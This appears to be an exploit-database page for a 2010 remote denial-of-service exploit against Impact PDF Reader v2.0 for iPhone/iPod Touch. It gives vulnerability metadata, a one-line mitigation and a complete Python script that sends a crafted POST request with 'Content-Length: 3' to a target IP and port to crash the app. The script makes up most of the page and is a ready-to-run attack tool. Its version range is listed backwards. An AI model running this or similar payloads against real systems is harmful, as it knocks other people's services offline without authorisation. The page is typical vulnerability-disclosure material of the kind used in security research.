header-logo
Suggest Exploit
vendor:
Impact PDF Reader
by:
Nishant Das Patnaik
7,8
CVSS
HIGH
Remote Denial of Service (DoS)
400
CWE
Product Name: Impact PDF Reader
Affected Version From: 2.0
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:impact_software:impact_pdf_reader
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iPod 2G with iOS v3.1.3
2010

Exploit: Impact PDF Reader v2.0 for iPhone/iPod Touch POST Method Remote DoS

Impact PDF Reader v2.0 and prior program versions are vulnerable to a remote denial of service attack. An attacker can send a specially crafted POST request with a content length of 3 to the target application, causing it to crash.

Mitigation:

Upgrade to the latest version of Impact PDF Reader.
Source

Exploit-DB raw data:

# Exploit: Impact PDF Reader v2.0 for iPhone/iPod Touch POST Method Remote DoS
# Date: 14/06/2010
# Author: Nishant Das Patnaik
# Website: http://nishantdaspatnaik.yolasite.com
# Software Link: http://itunes.apple.com/us/app/impact-pdf-reader/id322140783?mt=8*
# Version: 2.0, 1.2
# Tested on: iPod 2G with iOS v3.1.3
# Note: Impact PDF Reader v2.0 and prior program versions are also vulnerable.

#!/usr/bin/env python
import os
import sys
import socket
def main(argv):
    argc = len(argv)
    if argc != 3:
        print "Usage: %s <target-ip> <target-port>" % (argv[0])
        sys.exit(0)
    host = argv[1]
    port = int(argv[2])
    print "[+] Connecting: %s:%d" % (host, port)
    payload = "POST / HTTP/1.1\r\n"
    payload += "Host: %s:%d\r\n" % (host, port)
    payload += "Content-Length: 3\r\n\r\n"
    payload += "..."
    sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sd.connect((host, port))
    print "[+] Sending payload..."
    print "[+] Did you see that b00m? ;) http://nishantdaspatnaik.yolasite.com"
    sd.send(payload)
    sd.close()
if __name__ == "__main__":
    main(sys.argv)
    sys.exit(0)

Navigation

Suggest Exploit

Services By CQR